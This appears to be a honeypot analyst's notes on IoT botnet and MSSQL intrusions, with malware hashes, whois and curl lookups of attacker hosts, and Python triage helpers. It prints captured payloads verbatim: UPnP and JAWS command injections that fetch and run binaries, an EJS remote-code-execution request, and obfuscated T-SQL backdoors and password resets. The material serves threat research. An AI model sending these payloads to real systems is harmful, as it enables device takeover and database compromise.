7dc81afbf7c80ac654dc7b662f562caed8aea870049ed2cfe66cb6216ee93230  db0fa4b8db0333367e9bda3ab68b8042.mips
eb0cbe2e7e47fc12792d0b1399984369ec1f2844507bc4c2fdbf1626e2e89aa1  db0fa4b8db0333367e9bda3ab68b8042.mpsl
1a1562c15fff97371b2e0982a414af9ee920fdf4917ae757b26d2014cc483b49  db0fa4b8db0333367e9bda3ab68b8042.ppc
99bcc0b0b335aac600a36a2ac5bde9e427881e6079b643515160d18aa17b1be8  db0fa4b8db0333367e9bda3ab68b8042.sh4
5fd0028d5a5a7e03510e1b49fe112747cb27d09499e952b5b34fcc9efc8b23a1  db0fa4b8db0333367e9bda3ab68b8042.spc
71117f9486e266ddf4baf684b1ba91bc419d5be3dfd2f6704a5c869458d903bc  db0fa4b8db0333367e9bda3ab68b8042.x86

Strings of note (UPX compressed):

POST /picdesc.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf *mpsl; wget http://update.rawupdater.cf/db0fa4b8db0333367e9bda3ab68b8042.mpsl -O noaie; chmod 777 noaie; ./noaie realteck`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /wanipcn.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf *mpsl; wget http://update.rawupdater.cf/db0fa4b8db0333367e9bda3ab68b8042.mpsl -O noaie; chmod 777 noaie; ./noaie realteck`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
GET /shell?cd+/tmp;rm+-rf+*;wget+update.rawupdater.cf/jaws;sh+/tmp/jaws HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
/usr/sbin/
var/Challenge
app/hi3511
usr/dvr_main _8182T_1108
mnt/mtd/app/gui
l0 c/udevd
anko-app/ankosample _8182T_1104
var/tmp/sonia
stm_hi3511_dvr
/bin/busybox
/usr/lib/systemd/systemd
/usr/libexec/openssh/sftp-server
home/Davinci
/var/spool
/var/Sofia
/root/dvr_gui/
/root/dvr_app/
/anko-app/

Deliberate (safe) isolated infection:

unstable_is_the_history_of_universe

Targets mapped using some variation of:

$ cat contained_tor.txt | grep DPT= | sed -r "s/^.*DST=([^ ]+) .* DPT=([0-9]+) .*$/\1,\2/g" | sort | uniq -c | sed -r "s/^[ \t]+([0-9]+)[ \t]+/\1,/g"

(head)

1,100.0.0.200,52869
1,100.0.113.57,80
1,100.0.140.73,23
1,100.0.141.164,52869
1,100.0.15.118,80
1,100.0.155.248,52869
1,100.0.16.183,52869
1,100.0.166.72,23
1,100.0.175.128,52869
1,100.0.179.64,52869

(tail)

1,99.99.229.91,80
1,99.99.234.31,23
1,99.99.242.176,23
1,99.99.42.131,23
1,99.99.49.218,52869
1,99.99.50.224,23
1,99.99.61.177,80
1,99.99.87.213,23
1,99.99.92.57,23
1,99.99.97.93,80

The full list has a wc -l (line count) of 1226759. The destinations look evenly distributed with no single C2 server standing out, so this is probably a DDoS-for-hire service. Whether the targets are generated or come from a list I can’t tell; the ports are definitely not random.
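The grep/sed/sort/uniq pipelines used above for contained_dlz.txt and contained_tor.txt are the whole aggregation step; the following is an added example, not from the original notes, that does the same counting in Python over constructed iptables LOG lines and then applies the heuristic the notes apply by eye: one destination contacted an order of magnitude more often than the median target is a beacon/C2 candidate, while an even spread (every target hit once) is scan or DDoS traffic with no C2. The `log_line` helper, the sample addresses' counts and the ratio threshold are constructed for the example.

```python
import re
from collections import Counter
from statistics import median

# Matches the iptables LOG fields the sed expression above extracts (DST and DPT).
CONN_RE = re.compile(r"\bDST=(?P<dst>[0-9.]+)\b.*?\bDPT=(?P<dpt>\d+)\b")


def log_line(dst: str, dpt: int) -> str:
    """Build one constructed iptables LOG line (format only; the values are invented)."""
    return (f"Feb  9 22:58:00 vm kernel: IN= OUT=eth0 SRC=10.0.2.15 DST={dst} "
            f"LEN=60 TOS=0x00 PREC=0x00 TTL=64 PROTO=TCP SPT=40000 DPT={dpt} WINDOW=64240 SYN")


# Constructed sample: a spray of targets hit three times each plus one host
# contacted far more often, mimicking the contained_dlz.txt pattern.
SPRAY = [("239.85.203.76", 8081), ("239.90.50.0", 9000), ("239.92.161.134", 5555),
         ("239.93.238.107", 5555), ("239.95.147.183", 8088), ("239.97.17.202", 9000)]
BEACON = ("185.132.53.77", 1963)
SAMPLE_LOG = "\n".join([log_line(d, p) for d, p in SPRAY for _ in range(3)]
                       + [log_line(*BEACON) for _ in range(126)])


def parse_connections(log_text: str) -> Counter:
    """Count (DST, DPT) pairs, like the grep | sed | sort | uniq -c pipeline does."""
    counts = Counter()
    for line in log_text.splitlines():
        m = CONN_RE.search(line)
        if m:
            counts[(m["dst"], int(m["dpt"]))] += 1
    return counts


def port_distribution(counts: Counter) -> Counter:
    """Total hits per destination port, to see whether the scanner sticks to fixed ports."""
    ports = Counter()
    for (_, dpt), n in counts.items():
        ports[dpt] += n
    return ports


def beacon_candidates(counts: Counter, ratio: float = 10.0) -> list:
    """Return (dst, dpt, hits) tuples contacted at least `ratio` times the median target.

    This is how a single C2/beacon address stands out from a scan spray; an evenly
    spread run (the DDoS-for-hire case) yields an empty list.
    """
    if len(counts) < 2:
        return []
    baseline = median(counts.values())
    hits = [(dst, dpt, n) for (dst, dpt), n in counts.items() if n >= ratio * baseline]
    return sorted(hits, key=lambda t: -t[2])


if __name__ == "__main__":
    counts = parse_connections(SAMPLE_LOG)
    for (dst, dpt), n in counts.most_common(3):
        print(f"{n:6d} {dst}:{dpt}")
    print("ports:", dict(port_distribution(counts)))
    print("beacon candidates:", beacon_candidates(counts))
```

The median rather than the mean is used as the baseline on purpose: one heavily contacted host would drag the mean up and could hide itself, whereas the median of a scan spray stays at the per-target count.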

cfvnqmikm7qp1bg00010kw4569dqk941x.oast.me

From:

GET /page?id=2MQ7rcejZXwLnVqhktMnLk4XNG3&settings[view%20options][outputFunctionName]=xprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://cfvnqmikm7qp1bg00010kw4569dqk941x.oast.me%27)s HTTP/1.1\x0d\x0aHost: 46.148.26.81\x0d\x0aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\x0d\x0aConnection: close\x0d\x0aAccept-Encoding: gzip\x0d\x0a\x0d\x0a
cfvnqmikm7qp1bg00010kw4569dqk941x.oast.me. 3552	IN A 178.128.209.14
inetnum:        178.128.208.0 - 178.128.223.255
netname:        DIGITALOCEAN
country:        SG
admin-c:        PT7353-RIPE
tech-c:         PT7353-RIPE
status:         ASSIGNED PA
mnt-by:         digitalocean
created:        2019-04-17T13:57:12Z
last-modified:  2019-04-17T13:57:12Z
source:         RIPE

person:         DigitalOcean Network Operations
address:        101 Ave of the Americas, FL2
address:        New York, NY, 10013
address:        United States of America
phone:          +13478756044
nic-hdl:        PT7353-RIPE
mnt-by:         digitalocean
created:        2015-03-11T16:37:07Z
last-modified:  2022-08-23T13:31:16Z
source:         RIPE # Filtered
org:            ORG-DOI2-RIPE
$ curl -i http://cfvnqmikm7qp1bg00010kw4569dqk941x.oast.me
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: oast.me
X-Interactsh-Version: 1.0.7
Date: Thu, 02 Mar 2023 08:39:59 GMT
Content-Length: 72

<html><head></head><body>x149kqd9654wk01000gb1pq7mkimqnvfc</body></html>

This seems like either a dead link or an advanced attack to insert this string into the execSync() function being called. I can’t see any logical decode sequence; it could be a pointer to a previous infection that would create a function or binary.

116.235.87.163

MSSQL log:

\x01\x00\x10\x00\x00\x00\x01\x00declare @a varchar(8000) set @a=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\x01\x01\x02x\x00\x00\x02\x006465666462292C20406465666C616E6775616765292069662040406572726F72203C3E2030206F72206578697374732873656C656374202A2066726F6D206D61737465722E64626F2E737973786C6F67696E73207769746820286E6F6C6F636B29207768657265207372766964204953204E554C4C20616E64206E616D65203D20406C6F67696E616D6520616E6420736964203C3E20407369642920626567696E20726169736572726F722831353032352C2D312C2D312C406C6F67696E616D652920524F4C4C4241434B205452414E2072657475726E2028312920656E6420434F4D4D4954205452414E20657865632827757365206D6173746572206772616E7420616C6C20746F206E756C6C272920726169736572726F722831353239382C2D312C2D31292072657475726E2020283029 exec(@a) 

I haven’t done enough of these because I find them boring and repetitive. Decoded, this turns into:

create procedure sp_addlogin @loginame sysname,@passwd sysname = Null,@defdb sysname = 'master',@deflanguage sysname = Null,@sid varbinary(16) = Null ,@encryptopt varchar(20) = Null AS set nocount on Declare @ret int IF (not is_srvrolemember('securityadmin') = 1) begin dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid) raiserror(15247,-1,-1) return (1) end ELSE begin dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid) end set implicit_transactions off IF (@@trancount > 0) begin raiserror(15002,-1,-1,'sp_addlogin') return (1) end execute @ret = sp_validname @loginame if (@ret <> 0) return (1) if (charindex('\\', @loginame) > 0) begin raiserror(15006,-1,-1,@loginame) return (1) end if (@loginame = 'sa' or lower(@loginame) in ('public')) begin raiserror(15405, -1 ,-1, @loginame) return (1) end if exists(select * from master.dbo.syslogins where loginname = @loginame) begin raiserror(15025,-1,-1,@loginame) return (1) end IF db_id(@defdb) IS NULL begin raiserror(15010,-1,-1,@defdb) return (1) end IF (@deflanguage IS NOT Null) begin Execute @ret = sp_validlang @deflanguage IF (@ret <> 0) return (1) end ELSE begin select @deflanguage = name from master.dbo.syslanguages where langid = @@default_langid if @deflanguage is null select @deflanguage = N'us_english' end if ((@sid IS NOT Null) and (datalength(@sid) <> 16)) begin raiserror(15419,-1,-1) return (1) end else if @sid is null select @sid = newid() if (suser_sname(@sid) IS NOT Null) begin raiserror(15433,-1,-1) return (1) end declare @xstatus smallint select @xstatus = 2 if @encryptopt is null select @passwd = pwdencrypt(@passwd) else if @encryptopt = 'skip_encryption_old' begin select @xstatus = @xstatus | 0x800, @passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd))) end else if @encryptopt <> 'skip_encryption' begin raiserror(15600,-1,-1,'sp_addlogin') return 1 end BEGIN TRAN INSERT INTO master.dbo.sysxlogins VALUES(NULL, @sid, @xstatus, getdate(), getdate(), @loginame, 
convert(varbinary(256), @passwd),db_id(@\x01\x01\x02x\x00\x00\x02\x00defdb), @deflanguage) if @@error <> 0 or exists(select * from master.dbo.sysxlogins with (nolock) where srvid IS NULL and name = @loginame and sid <> @sid) begin raiserror(15025,-1,-1,@loginame) ROLLBACK TRAN return (1) end COMMIT TRAN exec('use master grant all to null') raiserror(15298,-1,-1) return  (0)

There are plenty of simple MSSQL exploits recorded, but the obfuscated ones tend to be slightly more interesting. Other obfuscation techniques include the “CREATE ASSEMBLY” command with obfuscated text or previously downloaded local files:

\x01\x01\x00a\x00\x00\x01\x00CREATE ASSEMBLY [NtApiDotNet] FROM \x27C:\x5cusers\x5cpublic\x5cNt.rar\x27 WITH PERMISSION_SET = UNSAFE '

They also seem to like potatoes:

\x01\x01\x00~\x00\x00\x01\x00CREATE PROCEDURE [dbo].[BadExecCommand20]AS EXTERNAL NAME [BadPotatoCLR20].[BadStoredProcedures20].[BadExecCommand20]
\x01\x01\x00\xc2\x00\x00\x01\x00DROP PROCEDURE [dbo].[ExecCommand35] DROP PROCEDURE [dbo].[SqlStoredProcedure35] DROP ASSEMBLY [SweetPotatoClr35] DROP ASSEMBLY [Stored
Procedures35] DROP ASSEMBLY [SqlStoredProcedure35]

Changing password example:

\x01\x01\x05a\x00\x00\x01\x00exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27users\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27usera\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27ps\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27mssqla\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27sql\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27web\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27wwo\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27wq\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27so\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27gaibian\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27xxa\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27win7\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27vice\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27sz\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27ss\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27se\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27gd\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27syn\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27sasa\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27count\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27sysaid\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27web\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27websa\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27sql\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x276door\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27nanshou1433\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27nanshou\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27shitou\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27nanshou\x27
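As an added example (not part of the original notes), this Python handles the `declare @a varchar(8000) set @a=<hex> exec(@a)` pattern from the MSSQL log above: it strips the 8-byte TDS packet headers that the capture shows spliced into the batch text (`\x01\x01\x02x\x00\x00\x02\x00` is type 0x01 SQL batch, status EOM, length 0x0278), hex-decodes the batch, and flags the procedure and assembly calls seen in the captures above (sp_addlogin, sp_password, CREATE ASSEMBLY with PERMISSION_SET = UNSAFE, EXTERNAL NAME). The hex used is the trailing portion of the batch reproduced above; the TDS stream wrapped around it, the `tds_packet` helper and the SUSPICIOUS list are the example's own.

```python
import re

# Tail of the hex-encoded T-SQL batch from the honeypot log above, one token
# per literal with its decoding in the comment. The full payload is truncated
# on the page, so only this trailing portion is reproduced.
SAMPLE_HEX = (
    "6465666462292C20"                                                      # defdb),
    "406465666C616E6775616765292069662040406572726F72203C3E2030206F7220"    # @deflanguage) if @@error <> 0 or
    "6578697374732873656C656374202A2066726F6D206D61737465722E64626F2E737973786C6F67696E7320"  # exists(select * from master.dbo.sysxlogins
    "7769746820286E6F6C6F636B29207768657265207372766964204953204E554C4C20"  # with (nolock) where srvid IS NULL
    "616E64206E616D65203D20406C6F67696E616D6520616E6420736964203C3E20407369642920"  # and name = @loginame and sid <> @sid)
    "626567696E20726169736572726F722831353032352C2D312C2D312C406C6F67696E616D652920"  # begin raiserror(15025,-1,-1,@loginame)
    "524F4C4C4241434B205452414E2072657475726E2028312920656E6420434F4D4D4954205452414E20"  # ROLLBACK TRAN return (1) end COMMIT TRAN
    "657865632827757365206D6173746572206772616E7420616C6C20746F206E756C6C272920"  # exec('use master grant all to null')
    "726169736572726F722831353239382C2D312C2D31292072657475726E2020283029"  # raiserror(15298,-1,-1) return  (0)
)

# Substrings worth a second look in a decoded batch; all appear in the captures above.
SUSPICIOUS = ("sp_addlogin", "sp_password", "sysxlogins", "grant all",
              "create assembly", "permission_set = unsafe", "external name")

# A long run of hex digits, optionally 0x-prefixed, not glued to other hex digits.
HEX_RUN = re.compile(r"(?<![0-9A-Fa-f])(?:0x)?([0-9A-Fa-f]{32,})(?![0-9A-Fa-f])")


def tds_packet(payload: bytes, last: bool, packet_id: int) -> bytes:
    """Build one constructed TDS SQL-batch packet (type 0x01) around `payload`.

    Header: type(1) status(1, 0x01 = end of message) length(2, big-endian,
    includes the header) spid(2) packet-id(1) window(1).
    """
    length = 8 + len(payload)
    return (bytes([0x01, 0x01 if last else 0x00]) + length.to_bytes(2, "big")
            + b"\x00\x00" + bytes([packet_id, 0x00]) + payload)


# Constructed stream: the batch split across two packets, as the capture above shows.
SAMPLE_BATCH = b"declare @a varchar(8000) set @a=" + SAMPLE_HEX.encode() + b" exec(@a)"
SAMPLE_STREAM = tds_packet(SAMPLE_BATCH[:40], False, 1) + tds_packet(SAMPLE_BATCH[40:], True, 2)


def strip_tds_headers(data: bytes) -> bytes:
    """Concatenate the payloads of a TDS packet stream, dropping each 8-byte header.

    A decoder that ignores the headers misreads the SQL, because a header can
    land in the middle of the batch text (as it does in the log above).
    """
    body = b""
    pos = 0
    while pos + 8 <= len(data):
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if length < 8:                 # malformed header: keep the rest verbatim
            body += data[pos:]
            return body
        body += data[pos + 8:pos + length]
        pos += length
    return body + data[pos:]           # fewer than 8 trailing bytes: keep as-is


def decode_hex_runs(text: str) -> list:
    """Decode every long hex run in `text`; a truncated odd-length run loses its last nibble."""
    out = []
    for m in HEX_RUN.finditer(text):
        run = m.group(1)
        if len(run) % 2:
            run = run[:-1]
        out.append(bytes.fromhex(run).decode("latin-1"))
    return out


def triage(stream: bytes) -> dict:
    """Strip TDS headers, decode any hex-encoded batch, and flag suspicious calls."""
    sql = strip_tds_headers(stream).decode("latin-1")
    decoded = decode_hex_runs(sql)
    haystack = " ".join([sql] + decoded).lower()
    return {"decoded": decoded, "hits": [s for s in SUSPICIOUS if s in haystack]}


if __name__ == "__main__":
    result = triage(SAMPLE_STREAM)
    print(result["decoded"][0])
    print("hits:", result["hits"])
```

Searching both the raw batch and its decoded form matters: the CREATE ASSEMBLY and sp_password commands above arrive in clear text, while the sp_addlogin rewrite only shows its hand after hex decoding.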

79.110.62.192

inetnum:        79.110.62.0 - 79.110.62.255
netname:        Serverion_BV-NET
abuse-c:        SB27731-RIPE
org:            ORG-DCB8-RIPE
country:        NL
admin-c:        SB27731-RIPE
mnt-lower:      mnt-nl-descapital-1
mnt-routes:     mnt-nl-descapital-1
mnt-domains:    mnt-nl-descapital-1
tech-c:         SB27731-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-NETERRA
created:        2022-06-10T07:58:45Z
last-modified:  2022-09-26T14:30:13Z
source:         RIPE

organisation:   ORG-DCB8-RIPE
org-name:       Des Capital B.V.
country:        NL
org-type:       LIR
address:        Krammer 8
address:        3232HE
address:        Brielle
address:        NETHERLANDS
phone:          +31851308338
phone:          +13023803902
admin-c:        AA35882-RIPE
tech-c:         TA7409-RIPE
abuse-c:        AR60082-RIPE
mnt-ref:        mnt-nl-descapital-1
mnt-ref:        RELCOMGROUP-EXT-MNT
mnt-ref:        FREENET-MNT
mnt-ref:        MNT-NETERRA
mnt-ref:        MNT-MAYAK
mnt-ref:        bg-mcreative-1-mnt
mnt-ref:        mnt-bg-mconsulting15-1
mnt-ref:        bg-mconsulting-1-mnt
mnt-ref:        MNT-MCONSULTING
mnt-ref:        mnt-bg-ccomp-1
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         mnt-nl-descapital-1
created:        2020-03-17T15:00:52Z
last-modified:  2022-09-26T13:22:34Z
source:         RIPE # Filtered
mnt-ref:        AZERONLINE-MNT
mnt-ref:        interlir-mnt
$ curl -i http://79.110.62.192
HTTP/1.1 200 OK
Date: Fri, 10 Mar 2023 20:59:03 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 14 Feb 2023 17:56:40 GMT
ETag: "2aa6-5f4acaf950965"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
    Modified from the Debian original for Ubuntu
    Last updated: 2016-11-16
    See: https://launchpad.net/bugs/1288690
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Apache2 Ubuntu Default Page: It works</title>
    <style type="text/css" media="screen">
  * {
    margin: 0px 0px 0px 0px;
    padding: 0px 0px 0px 0px;
  }

Using previous architecture names, from just one NIGarm filename the following was found:

NIGarm:  ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
NIGarm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
NIGarm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
NIGarm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
NIGm68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
NIGmips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
NIGmpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
NIGppc:  ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
NIGsh4:  ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
NIGspc:  ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
NIGx86:  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

128.199.134.42

inetnum:        128.199.0.0 - 128.199.255.255
netname:        DigitalOcean
descr:          DigitalOcean, LLC
country:        US
admin-c:        PT7353-RIPE
tech-c:         PT7353-RIPE
status:         LEGACY
mnt-by:         digitalocean
mnt-domains:    digitalocean
mnt-routes:     digitalocean
created:        2004-07-20T10:29:14Z
last-modified:  2020-03-31T14:17:22Z
source:         RIPE
org:            ORG-DOI2-RIPE

organisation:   ORG-DOI2-RIPE
org-name:       DigitalOcean, LLC
country:        US
org-type:       LIR
address:        101 Avenue of the Americas, 10th Floor
address:        New York
address:        10013
address:        UNITED STATES
phone:          +1 888 890 6714
mnt-ref:        digitalocean
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         digitalocean
abuse-c:        AD10778-RIPE
language:       EN
created:        2012-11-29T14:59:01Z
last-modified:  2020-12-16T13:24:44Z
source:         RIPE # Filtered
$ curl -i http://128.199.134.42/
HTTP/1.1 200 OK
Date: Fri, 10 Mar 2023 20:57:44 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Wed, 08 Mar 2023 14:16:29 GMT
ETag: "0-5f6642c9c6c51"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://128.199.134.42/596a96cc7bf9108cd896f33c44aedc8a/
HTTP/1.1 200 OK
Date: Fri, 10 Mar 2023 20:57:26 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Wed, 08 Mar 2023 14:16:29 GMT
ETag: "0-5f6642c9c7421"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

194.55.224.203

inetnum:        194.55.224.0 - 194.55.224.255
netname:        SERVERION_BV-NET
org:            ORG-DCB8-RIPE
country:        NL
admin-c:        EA7138-RIPE
tech-c:         EA7138-RIPE
abuse-c:        AR63171-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-NETERRA
mnt-routes:     lir-us-delis-1-MNT
mnt-domains:    lir-us-delis-1-MNT
mnt-routes:     mnt-nl-descapital-1
mnt-domains:    mnt-nl-descapital-1
created:        2023-02-23T09:09:04Z
last-modified:  2023-02-23T10:08:54Z
source:         RIPE

organisation:   ORG-DCB8-RIPE
org-name:       Des Capital B.V.
country:        NL
org-type:       LIR
address:        Krammer 8
address:        3232HE
address:        Brielle
address:        NETHERLANDS
$ curl -i http://194.55.224.203
HTTP/1.1 200 OK
Date: Tue, 14 Mar 2023 18:07:18 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Fri, 10 Mar 2023 17:18:35 GMT
ETag: "8-5f68ef39190b0"
Accept-Ranges: bytes
Content-Length: 8
Content-Type: text/html; charset=UTF-8

i love u

100.43.163.61

$ whois 100.43.163.61
[Querying whois.arin.net]
[Redirected to vault.krypt.com:4321]
[Querying vault.krypt.com]
[Unable to connect to remote host]
$ whois 74.222.172.110
[Querying whois.arin.net]
[Redirected to vault.krypt.com:4321]
[Querying vault.krypt.com]
[Unable to connect to remote host]
vault.krypt.com.	280	IN	A	74.222.172.110
usb4.verichains.co.	456	IN	A	100.43.163.61
$ wget http://100.43.163.61/jaws
--2023-03-14 13:09:31--  http://100.43.163.61/jaws
Connecting to 100.43.163.61:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://usb4.verichains.co/jaws [following]
--2023-03-14 13:09:31--  https://usb4.verichains.co/jaws
Resolving usb4.verichains.co (usb4.verichains.co)... 100.43.163.61
Connecting to usb4.verichains.co (usb4.verichains.co)|100.43.163.61|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-03-14 13:09:32 ERROR 404: Not Found.
$ curl -i https://usb4.verichains.co
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 14 Mar 2023 18:11:34 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 612
Last-Modified: Tue, 14 Mar 2023 12:10:06 GMT
Connection: keep-alive
ETag: "6410641e-264"
Accept-Ranges: bytes

<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>

Say what? I’m going to guess they cleaned up an infection here.

45.81.243.34

inetnum:        45.81.243.0 - 45.81.243.255
netname:        SERVERION_BV-NET
org:            ORG-DCB8-RIPE
country:        NL
admin-c:        EA7138-RIPE
tech-c:         EA7138-RIPE
abuse-c:        AR63171-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-NETERRA
mnt-routes:     lir-us-delis-1-MNT
mnt-routes:     mnt-nl-descapital-1
mnt-domains:    lir-us-delis-1-MNT
mnt-domains:    mnt-nl-descapital-1
created:        2023-02-23T09:05:51Z
last-modified:  2023-02-23T10:05:21Z
source:         RIPE

organisation:   ORG-DCB8-RIPE
org-name:       Des Capital B.V.
country:        NL
org-type:       LIR
address:        Krammer 8
address:        3232HE
address:        Brielle
address:        NETHERLANDS
$ curl -i http://45.81.243.34
HTTP/1.1 200 OK
Date: Thu, 30 Mar 2023 23:49:40 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Mon, 20 Mar 2023 15:58:27 GMT
ETag: "0-5f756ff5e8711"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://45.81.243.34/a/
HTTP/1.1 200 OK
Date: Fri, 07 Apr 2023 09:22:36 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1
Index of /a

   [ICO]             Name            Last modified   Size Description
═════════════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                            -  
[   ]       76d32be0.sh             2023-03-17 07:03 9.8K  
[   ]       77676d32be0.sh          2023-03-20 19:49 9.8K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  81K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  33K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  29K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  37K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  57K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  34K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  78K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  34K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  35K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  31K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  73K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  81K  
[   ]       abcdb0fa4b8db0333367..> 2023-03-17 06:28  32K  
[DIR]       b/                      2023-03-20 12:21    -  
[   ]       bot.arm7                2023-03-20 12:21  57K  
